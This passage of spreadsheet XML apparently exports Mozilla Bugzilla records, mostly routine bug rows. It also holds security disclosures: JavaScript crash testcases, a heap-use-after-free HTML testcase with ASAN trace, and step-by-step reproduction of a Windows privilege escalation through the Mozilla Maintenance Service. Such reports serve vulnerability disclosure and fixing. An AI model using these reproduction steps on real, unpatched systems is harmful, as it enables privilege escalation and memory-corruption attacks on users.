        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6188" t="inlineStr">
        <is>
          <t>2.0</t>
        </is>
      </c>
      <c r="T6188" t="n">
        <v>1</v>
      </c>
      <c r="U6188" t="n">
        <v>0</v>
      </c>
      <c r="V6188" t="n">
        <v>3</v>
      </c>
      <c r="W6188" t="inlineStr">
        <is>
          <t>Created attachment 413517
getting started for any user other than '3.6 without extension'
Attached is the getting started page for any user that is *not* on 3.6 without the extension. This includes 
1. 3.6 and below with the extension, 
2. 3.5 and below without the extension, and 
3. non-Fx users.
Ryan, links to the getpersonas.com site are currently to EN-US (eg,
http://www.getpersonas.com/en-US/). Just want to be sure that doesn't affect
the process for localization.</t>
        </is>
      </c>
      <c r="X6188" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6189">
      <c r="A6189" t="n">
        <v>1495429</v>
      </c>
      <c r="B6189" t="inlineStr">
        <is>
          <t>2018-10-01 06:44:57 -0700</t>
        </is>
      </c>
      <c r="C6189" t="inlineStr">
        <is>
          <t>Sorting failures by column should do it across all pages of failures, not just the current page</t>
        </is>
      </c>
      <c r="D6189" t="inlineStr">
        <is>
          <t>2021-12-05 14:47:40 -0800</t>
        </is>
      </c>
      <c r="E6189" t="n">
        <v>1</v>
      </c>
      <c r="F6189" t="n">
        <v>1</v>
      </c>
      <c r="G6189" t="n">
        <v>7</v>
      </c>
      <c r="H6189" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6189" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6189" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K6189" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6189" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6189" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6189" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6189" t="inlineStr"/>
      <c r="Q6189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6189" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6189" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6189" t="n">
        <v>1</v>
      </c>
      <c r="U6189" t="n">
        <v>0</v>
      </c>
      <c r="V6189" t="n">
        <v>12</v>
      </c>
      <c r="W6189" t="inlineStr">
        <is>
          <t>Usually when trying to find out when a particular intermittent failure regressed (in that the frequency went way up) the easiest way is to look at all the failures in a particular time range, sort by push time, and eyeball it to see when the frequency went up. However with the new intermittent failures view this is impossible to do because sorting by push time only sorts the current page of results. So if there's a result on the second page that's earlier than the earliest result on the first page, it doesn't show up. Either the paging should be removed entirely, or sorting should sort across all the pages. Crash-stats an an example of something that gets this right, because even though there can be multiple pages of crash reports for a given signature, when you sort by a column it sorts across all pages.</t>
        </is>
      </c>
      <c r="X6189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6190">
      <c r="A6190" t="n">
        <v>867482</v>
      </c>
      <c r="B6190" t="inlineStr">
        <is>
          <t>2013-04-30 18:25:35 -0700</t>
        </is>
      </c>
      <c r="C6190" t="inlineStr">
        <is>
          <t>Crash [@ js::types::Type::ObjectType] or [@ GetValueType] or Assertion failure: !val.isMagic(), at jsobj.cpp</t>
        </is>
      </c>
      <c r="D6190" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:17 -0800</t>
        </is>
      </c>
      <c r="E6190" t="n">
        <v>1</v>
      </c>
      <c r="F6190" t="n">
        <v>1</v>
      </c>
      <c r="G6190" t="n">
        <v>3</v>
      </c>
      <c r="H6190" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6190" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6190" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6190" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6190" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6190" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6190" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6190" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q6190" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6190" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6190" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T6190" t="n">
        <v>1</v>
      </c>
      <c r="U6190" t="n">
        <v>0</v>
      </c>
      <c r="V6190" t="n">
        <v>30</v>
      </c>
      <c r="W6190" t="inlineStr">
        <is>
          <t>Created attachment 743997
debug and opt stacks
try {
    x = []
    x.length = 7
    Object.defineProperty(this, "y", {
        get: function() {
            return ([]).concat(x)
        }
    })
    Array.prototype.unshift.call(x, x)
} catch (e) {}
y[8]
Array.prototype.forEach.call(y, Array.indexOf)
crashes js opt shell on m-c changeset 1150403342b2 with --no-baseline -a --no-ion at GetValueType and crashes js debug shell at js::types::Type::ObjectType
s-s because scary memory address 0xfffb7fffffffffff is being accessed.
This requires --no-baseline, and occurs when --no-baseline was first added as a shell flag, so autoBisect is unable to get an accurate bisection.
The following variant does not crash js opt shell but asserts js debug shell at Assertion failure: !val.isMagic(), at jsobj.cpp :
x = [];
x.length = 7
Object.defineProperty(this, "y", {
    get: function() {
        return ([]).concat(x)
    }
});
Array.prototype.unshift.call(x, x)
y[1] = undefined
Array.prototype.forEach.call(y, Array.indexOf)</t>
        </is>
      </c>
      <c r="X6190" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6191">
      <c r="A6191" t="n">
        <v>1275538</v>
      </c>
      <c r="B6191" t="inlineStr">
        <is>
          <t>2016-05-25 11:46:02 -0700</t>
        </is>
      </c>
      <c r="C6191" t="inlineStr">
        <is>
          <t>Crash in mozilla::MediaFormatReader::RequestVideoData</t>
        </is>
      </c>
      <c r="D6191" t="inlineStr">
        <is>
          <t>2016-05-30 06:37:57 -0700</t>
        </is>
      </c>
      <c r="E6191" t="n">
        <v>1</v>
      </c>
      <c r="F6191" t="n">
        <v>1</v>
      </c>
      <c r="G6191" t="n">
        <v>3</v>
      </c>
      <c r="H6191" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6191" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6191" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K6191" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6191" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6191" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6191" t="inlineStr"/>
      <c r="Q6191" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6191" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6191" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T6191" t="n">
        <v>1</v>
      </c>
      <c r="U6191" t="n">
        <v>0</v>
      </c>
      <c r="V6191" t="n">
        <v>16</v>
      </c>
      <c r="W6191" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-51fb7abe-4cc5-4723-9411-4fd6d2160525.
=============================================================
29 crashes reported on Nightly Build 20160524073714 - https://crash-stats.mozilla.com/signature/?build_id=20160524073714&amp;product=Firefox&amp;release_channel=nightly&amp;platform=Windows&amp;signature=mozilla%3A%3AMediaFormatReader%3A%3ARequestVideoData&amp;date=%3E%3D2016-05-24
Bug 1273018 had some similiar signatures in MediaFormatReader. Adding a few folks from that bug.</t>
        </is>
      </c>
      <c r="X6191" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6192">
      <c r="A6192" t="n">
        <v>1574980</v>
      </c>
      <c r="B6192" t="inlineStr">
        <is>
          <t>2019-08-19 09:09:02 -0700</t>
        </is>
      </c>
      <c r="C6192" t="inlineStr">
        <is>
          <t>Privilege Escalation via Mozilla Maintenance Service if Firefox is Installed to a Writable Location</t>
        </is>
      </c>
      <c r="D6192" t="inlineStr">
        <is>
          <t>2024-05-30 10:02:01 -0700</t>
        </is>
      </c>
      <c r="E6192" t="n">
        <v>1</v>
      </c>
      <c r="F6192" t="n">
        <v>1</v>
      </c>
      <c r="G6192" t="n">
        <v>3</v>
      </c>
      <c r="H6192" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6192" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J6192" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K6192" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6192" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6192" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N6192" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6192" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main69+][adv-esr68.1+][adv-esr60.9+]</t>
        </is>
      </c>
      <c r="Q6192" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6192" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6192" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T6192" t="n">
        <v>1</v>
      </c>
      <c r="U6192" t="n">
        <v>0</v>
      </c>
      <c r="V6192" t="n">
        <v>28</v>
      </c>
      <c r="W6192" t="inlineStr">
        <is>
          <t>Created attachment 9086436
poc.zip
The full Mozilla Firefox Installer allows a user to choose a custom install location. (Personally I have used this to install firefox on my secondary hard drive at D:\Firefox.)
The installer doesn't adjust the rights of the created firefox directory, so for example, if the user chooses a writable location the firefox directory is writable after the installation.
A writable firefox directory can be exploited to gain system rights via the mozilla maintenance service. During an update the maintenanceservice.exe from the firefox directory is copied to &lt;mozilla-maintenance-service-directory&gt;/maintenanceservice_tmp.exe and executed from there with system rights. By manipulating the maintenanceservice.exe during a update it is possible to escalate privileges.
POC (tested on Windows 10):
1.) install firefox via the full installer (http://archive.mozilla.org/pub/firefox/releases/68.0.2/win32/en-US/Firefox%20Setup%2068.0.2.exe) to a writable directory for example D:\Firefox
2.) unzip attached zip
3.) download https://archive.mozilla.org/pub/firefox/releases/68.0.2/update/win64/en-US/firefox-68.0.2.complete.mar to &lt;unzipped-direcory&gt;/update/0/update.mar
4.) change the firefox paths in copyloop.bat and mozupdate.bat to the firefox install location
5.) change the path to the update/0 directory in mozupdateservicetest.bat to your path
6.) start copyloop.bat (this will overwrite the maintenanceservice.exe in the firefox directory with a test.exe during the update) and mozupdate.bat (will run the update)
7.) After the update finished you will see that:
- the test.exe was copied to &lt;mozilla-maintenance-service-directory&gt;/maintenanceservice_tmp.exe.
- this maintenanceservice_tmp.exe is running as SYSTEM user</t>
        </is>
      </c>
      <c r="X6192" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6193">
      <c r="A6193" t="n">
        <v>250862</v>
      </c>
      <c r="B6193" t="inlineStr">
        <is>
          <t>2004-07-11 04:17:55 -0700</t>
        </is>
      </c>
      <c r="C6193" t="inlineStr">
        <is>
          <t>browser accepts dragged javascript: links (same-origin security hole)</t>
        </is>
      </c>
      <c r="D6193" t="inlineStr">
        <is>
          <t>2007-11-06 11:44:48 -0800</t>
        </is>
      </c>
      <c r="E6193" t="n">
        <v>1</v>
      </c>
      <c r="F6193" t="n">
        <v>1</v>
      </c>
      <c r="G6193" t="n">
        <v>3</v>
      </c>
      <c r="H6193" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6193" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6193" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K6193" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L6193" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6193" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6193" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6193" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q6193" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6193" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6193" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6193" t="n">
        <v>1</v>
      </c>
      <c r="U6193" t="n">
        <v>0</v>
      </c>
      <c r="V6193" t="n">
        <v>22</v>
      </c>
      <c r="W6193" t="inlineStr">
        <is>
          <t>Firefox accepts drags of javascript: links, allowing same-origin violations. 
Exploiting this hole requires getting the user to cooperate with instructions,
but does not require the user to do anything likely to make them suspicious.
I think Seamonkey has the same hole.
Combined with 250725 (Drag-and-dropped link skips CheckLoadURI), this
same-origin hole becomes an arbitrary code execution hole.</t>
        </is>
      </c>
      <c r="X6193" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6194">
      <c r="A6194" t="n">
        <v>310046</v>
      </c>
      <c r="B6194" t="inlineStr">
        <is>
          <t>2005-09-26 04:43:00 -0700</t>
        </is>
      </c>
      <c r="C6194" t="inlineStr">
        <is>
          <t>Release Notes for Bugzilla 2.18.4</t>
        </is>
      </c>
      <c r="D6194" t="inlineStr">
        <is>
          <t>2005-09-30 13:12:37 -0700</t>
        </is>
      </c>
      <c r="E6194" t="n">
        <v>1</v>
      </c>
      <c r="F6194" t="n">
        <v>1</v>
      </c>
      <c r="G6194" t="n">
        <v>4</v>
      </c>
      <c r="H6194" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6194" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6194" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K6194" t="inlineStr">
        <is>
          <t>2.18.3</t>
        </is>
      </c>
      <c r="L6194" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6194" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6194" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6194" t="inlineStr"/>
      <c r="Q6194" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6194" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6194" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T6194" t="n">
        <v>1</v>
      </c>
      <c r="U6194" t="n">
        <v>0</v>
      </c>
      <c r="V6194" t="n">
        <v>3</v>
      </c>
      <c r="W6194" t="inlineStr">
        <is>
          <t>We just need to point to the SecAdv -- I don't think we really have any other
bug-fixes in 2.18.4.</t>
        </is>
      </c>
      <c r="X6194" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6195">
      <c r="A6195" t="n">
        <v>1366214</v>
      </c>
      <c r="B6195" t="inlineStr">
        <is>
          <t>2017-05-19 03:09:16 -0700</t>
        </is>
      </c>
      <c r="C6195" t="inlineStr">
        <is>
          <t>The result not found message should be "Sorry! There are no results in Options for " on Windows</t>
        </is>
      </c>
      <c r="D6195" t="inlineStr">
        <is>
          <t>2017-05-29 07:23:09 -0700</t>
        </is>
      </c>
      <c r="E6195" t="n">
        <v>1</v>
      </c>
      <c r="F6195" t="n">
        <v>1</v>
      </c>
      <c r="G6195" t="n">
        <v>2</v>
      </c>
      <c r="H6195" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6195" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6195" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K6195" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L6195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6195" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6195" t="inlineStr">
        <is>
          <t>[photon-preference]</t>
        </is>
      </c>
      <c r="Q6195" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6195" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6195" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T6195" t="n">
        <v>1</v>
      </c>
      <c r="U6195" t="n">
        <v>0</v>
      </c>
      <c r="V6195" t="n">
        <v>18</v>
      </c>
      <c r="W6195" t="inlineStr">
        <is>
          <t>The result not found message should be "Sorry! There are no results in Options for " on Linux/Windows.
The spec: https://mozilla.invisionapp.com/share/ZDAGPK3AF#/screens/218928235</t>
        </is>
      </c>
      <c r="X6195" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6196">
      <c r="A6196" t="n">
        <v>1419363</v>
      </c>
      <c r="B6196" t="inlineStr">
        <is>
          <t>2017-11-21 03:33:25 -0800</t>
        </is>
      </c>
      <c r="C6196" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable</t>
        </is>
      </c>
      <c r="D6196" t="inlineStr">
        <is>
          <t>2024-05-30 09:38:43 -0700</t>
        </is>
      </c>
      <c r="E6196" t="n">
        <v>1</v>
      </c>
      <c r="F6196" t="n">
        <v>1</v>
      </c>
      <c r="G6196" t="n">
        <v>3</v>
      </c>
      <c r="H6196" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6196" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6196" t="inlineStr">
        <is>
          <t>Audio/Video: MediaStreamGraph</t>
        </is>
      </c>
      <c r="K6196" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L6196" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6196" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6196" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6196" t="inlineStr">
        <is>
          <t>[adv-main58+][adv-esr52.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q6196" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6196" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6196" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T6196" t="n">
        <v>1</v>
      </c>
      <c r="U6196" t="n">
        <v>0</v>
      </c>
      <c r="V6196" t="n">
        <v>22</v>
      </c>
      <c r="W6196" t="inlineStr">
        <is>
          <t>Created attachment 8930432
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=d4753dc14b2ab9c42123b6d60a68106df40f45cd). It requires the fuzzPriv extension.
crash.html:
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o55=document.createElementNS('http://www.w3.org/1999/xhtml','video');
	o73=document.createElementNS('http://www.w3.org/1999/xhtml','video');
	o81=o73.mozCaptureStreamUntilEnded();
	o55.srcObject=o81;
	spin();
	o55=null;
	o81=null;
	o73.setAttribute('src','data:video/webm;base64,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');
	o73.play();
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();;
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN ouput:
=================================================================
==24229==ERROR: AddressSanitizer: heap-use-after-free on address 0x61a00009eb70 at pc 0x7ff2afdc4883 bp 0x7ffea6c8e490 sp 0x7ffea6c8e488
READ of size 8 at 0x61a00009eb70 thread T0 (file:// Content)
    #0 0x7ff2afdc4882 in operator! /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:312:36
    #1 0x7ff2afdc4882 in mozilla::dom::HTMLMediaElement::NotifyMediaStreamTracksAvailable(mozilla::DOMMediaStream*) /builds/worker/workspace/build/src/dom/html/HTMLMediaElement.cpp:2258
    #2 0x7ff2affd159f in mozilla::DOMMediaStream::CheckTracksAvailable() /builds/worker/workspace/build/src/dom/media/DOMMediaStream.cpp:1361:19
    #3 0x7ff2affeba42 in applyImpl&lt;mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #4 0x7ff2affeba42 in apply&lt;mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #5 0x7ff2affeba42 in mozilla::detail::RunnableMethodImpl&lt;mozilla::DOMMediaStream*, void (mozilla::DOMMediaStream::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #6 0x7ff2aad2a428 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/TaskDispatcher.h:214:37
    #7 0x7ff2aad2758b in mozilla::EventTargetWrapper::Runner::Run() /builds/worker/workspace/build/src/xpcom/threads/AbstractThread.cpp:150:32
    #8 0x7ff2aad24861 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #9 0x7ff2aad4a196 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #10 0x7ff2aad64b18 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #11 0x7ff2abb3ff41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #12 0x7ff2abaa06bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #13 0x7ff2abaa06bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #14 0x7ff2abaa06bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #15 0x7ff2b15a723f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
    #16 0x7ff2b58dede7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #17 0x7ff2abaa06bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7ff2abaa06bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7ff2abaa06bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7ff2b58de79a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #21 0x4ebb1e in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #22 0x4ebb1e in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #23 0x7ff2c857c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #24 0x41d408 in _start (/fuzzer3/firefox/firefox+0x41d408)
0x61a00009eb70 is located 240 bytes inside of 1400-byte region [0x61a00009ea80,0x61a00009eff8)
freed by thread T0 (file:// Content) here:
    #0 0x4bb93b in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7ff2aabe3a17 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
    #2 0x7ff2aabeb0bb in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
    #3 0x7ff2aabeb0bb in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3925
    #4 0x7ff2aabea5d3 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3746:9
    #5 0x7ff2aabee420 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4315:21
    #6 0x7ff2adc7ac0d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1505:3
    #7 0x7ff2ad7b6a5b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1450:3
    #8 0x7ff2aad74ce1 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7ff2ac587df0 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7ff2ac587df0 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7ff2ac587df0 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7ff2ac58eb7f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #14 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #15 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #16 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #17 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #18 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #19 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #20 0x7ff2b65caef3 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2967:12
    #21 0x7ff2ac4a739b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #23 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #24 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #25 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
